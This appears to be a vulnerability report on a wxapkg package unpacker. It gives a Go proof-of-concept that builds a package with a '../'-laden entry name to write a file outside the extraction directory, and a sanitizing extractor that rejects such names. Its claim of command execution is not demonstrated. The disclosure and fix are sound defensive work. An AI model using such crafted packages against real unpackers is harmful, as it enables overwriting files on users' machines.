Malicious wxapkg File Leading to Arbitrary File Write and Command Execution #85

@ac0d3r

Vulnerability Report: Malicious wxapkg File Leading to Arbitrary File Write and Command Execution

Summary:

A vulnerability was discovered in the handling of wxapkg files (WeChat Mini Program package format). By crafting a malicious wxapkg file, an attacker can exploit improper validation during package parsing and extraction. This leads to arbitrary file write on the host file system and can be further escalated to remote command execution under certain conditions.

Vulnerability Details:

  • Affected Component: wxapkg file parsing and extraction logic
  • Type of Vulnerability: Arbitrary File Write, Command Execution
  • Attack Vector: Malicious wxapkg file

Proof of Concept (PoC):

A proof-of-concept wxapkg file was crafted containing:

package unpack

import (
	"bytes"
	"encoding/binary"
	"testing"
)

// createTestWxapkg builds a one-file wxapkg whose entry name climbs out of the
// extraction directory with "../" segments.
func createTestWxapkg() []byte {
	var buf bytes.Buffer

	// header: 0xBE, 4 reserved bytes, indexInfoLength, bodyInfoLength, 0xED
	buf.WriteByte(0xBE)

	binary.Write(&buf, binary.BigEndian, uint32(0))

	indexLenPos := buf.Len()
	binary.Write(&buf, binary.BigEndian, uint32(0)) // indexInfoLength, patched below
	binary.Write(&buf, binary.BigEndian, uint32(0)) // bodyInfoLength, patched below

	buf.WriteByte(0xED)

	// file index
	// files number
	binary.Write(&buf, binary.BigEndian, uint32(1))

	indexStart := buf.Len()

	// entry name with path traversal; the unpacker joins it onto the output directory as-is
	filename := "../../../../../../../../Users/whoami/Desktop/zznq.txt"
	fileContent := []byte("zznq todo")

	binary.Write(&buf, binary.BigEndian, uint32(len(filename)))
	buf.WriteString(filename)

	dataOffsetPos := buf.Len()
	binary.Write(&buf, binary.BigEndian, uint32(0)) // data offset, patched below
	binary.Write(&buf, binary.BigEndian, uint32(len(fileContent)))

	// back-patch the two header lengths now that the index size is known
	b := buf.Bytes()
	binary.BigEndian.PutUint32(b[indexLenPos:], uint32(buf.Len()-indexStart))
	binary.BigEndian.PutUint32(b[indexLenPos+4:], uint32(len(fileContent)))

	// data body
	fileDataPos := buf.Len()
	buf.Write(fileContent)

	// back-patch the entry's data offset
	b = buf.Bytes()
	binary.BigEndian.PutUint32(b[dataOffsetPos:], uint32(fileDataPos))

	return buf.Bytes()
}

// TestUnPack feeds the crafted package to the unpacker with "./" as the output
// directory; the entry is written outside it.
func TestUnPack(t *testing.T) {
	data := createTestWxapkg()
	t.Log(UnpackWxapkg(data, "./"))
}

Recommendations:

  • Implement strict path sanitization when extracting wxapkg files (unpack.go#L179)

Severity: Critical
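The following is an added example of what the recommended check looks like in a complete unpacker; it is not the project's own code and does not reproduce unpack.go. It parses the header and file index in the layout the PoC above builds, then validates every entry name against the output directory before writing a single byte, so a package with one traversal entry produces no files. The function names (parseIndex, safeJoin, extract, buildWxapkg), the treatment of the two header length fields as untrusted, and the assumption that wxapkg entry names carry a leading "/" relative to the package root are all assumptions made for this example; the sample package is constructed inline.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

type entry struct {
	name         string
	offset, size uint32
}
var errTraversal = errors.New("wxapkg: entry name escapes the extraction root")

// parseIndex reads the 14-byte header (0xBE, u32, u32 indexInfoLength, u32 bodyInfoLength, 0xED) and the
// file table (u32 count, then per entry: u32 nameLen, name, u32 offset, u32 size), the layout the PoC builds.
// The two header length fields are attacker-controlled and deliberately ignored (assumption for this example).
func parseIndex(data []byte) ([]entry, error) {
	if len(data) < 18 || data[0] != 0xBE || data[13] != 0xED {
		return nil, errors.New("wxapkg: bad header")
	}
	be := binary.BigEndian
	count, r := be.Uint32(data[14:]), bytes.NewReader(data[18:])
	if uint64(count)*12 > uint64(r.Len()) { // each entry needs >= 12 bytes; bound the count before allocating
		return nil, errors.New("wxapkg: file count exceeds index size")
	}
	entries := make([]entry, 0, count)
	for i := uint32(0); i < count; i++ {
		var nameLen uint32
		if err := binary.Read(r, be, &nameLen); err != nil || uint64(nameLen)+8 > uint64(r.Len()) {
			return nil, errors.New("wxapkg: truncated index")
		}
		rec := make([]byte, nameLen+8) // name, then offset and size
		r.Read(rec)                    // cannot come up short: length checked against r.Len() above
		entries = append(entries, entry{string(rec[:nameLen]), be.Uint32(rec[nameLen:]), be.Uint32(rec[nameLen+4:])})
	}
	return entries, nil
}

// safeJoin resolves name under root (stripping the leading "/" wxapkg names carry, assumed here) and rejects
// empty names, NUL bytes, absolute paths, drive letters, and any ".." that survives cleaning.
func safeJoin(root, name string) (string, error) {
	name = strings.TrimLeft(name, "/")
	if name == "" || strings.ContainsRune(name, 0) || filepath.IsAbs(name) || filepath.VolumeName(name) != "" {
		return "", errTraversal
	}
	dest := filepath.Join(root, filepath.FromSlash(name)) // Join cleans, so any surviving ".." is leading
	rel, err := filepath.Rel(root, dest)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", errTraversal
	}
	return dest, nil
}

// extract validates every entry before writing anything, so one bad name yields no files at all.
func extract(data []byte, root string) (int, error) {
	entries, err := parseIndex(data)
	if err != nil {
		return 0, err
	}
	dests := make([]string, len(entries))
	for i, e := range entries {
		if dests[i], err = safeJoin(root, e.name); err != nil {
			return 0, fmt.Errorf("%q: %w", e.name, err)
		}
		if uint64(e.offset)+uint64(e.size) > uint64(len(data)) {
			return 0, fmt.Errorf("%q: body range out of bounds", e.name)
		}
	}
	for i, e := range entries {
		if err := os.MkdirAll(filepath.Dir(dests[i]), 0o755); err != nil {
			return i, err
		}
		if err := os.WriteFile(dests[i], data[e.offset:][:e.size], 0o644); err != nil {
			return i, err
		}
	}
	return len(entries), nil
}

// buildWxapkg assembles a one-entry package in the layout above (constructed test input, not a real package).
func buildWxapkg(name string, content []byte) []byte {
	var buf bytes.Buffer
	indexLen := uint32(4 + len(name) + 8) // nameLen + name + offset + size
	hdr := struct{ Magic byte; Reserved, IndexLen, BodyLen uint32; End byte }{0xBE, 0, indexLen, uint32(len(content)), 0xED}
	binary.Write(&buf, binary.BigEndian, hdr)
	binary.Write(&buf, binary.BigEndian, []uint32{1, uint32(len(name))}) // file count, nameLen
	buf.WriteString(name)
	binary.Write(&buf, binary.BigEndian, []uint32{14 + 4 + indexLen, uint32(len(content))}) // body offset, size
	buf.Write(content)
	return buf.Bytes()
}

func main() {
	root, _ := os.MkdirTemp("", "wxapkg-demo")
	defer os.RemoveAll(root)
	fmt.Println(extract(buildWxapkg("../../../../../../../../Users/whoami/Desktop/zznq.txt", []byte("zznq todo")), root))
}
```

Two points of the design are worth keeping when porting this check into the real unpacker: validation runs over the whole index before the first write, so a package cannot drop some files and then fail, and the file count and every offset/size pair are bounded against the bytes actually present, since those fields come from the same attacker as the name. The check does not defend against symlinks that already exist under the output directory; os.MkdirAll and os.WriteFile follow them, so extract into a fresh directory.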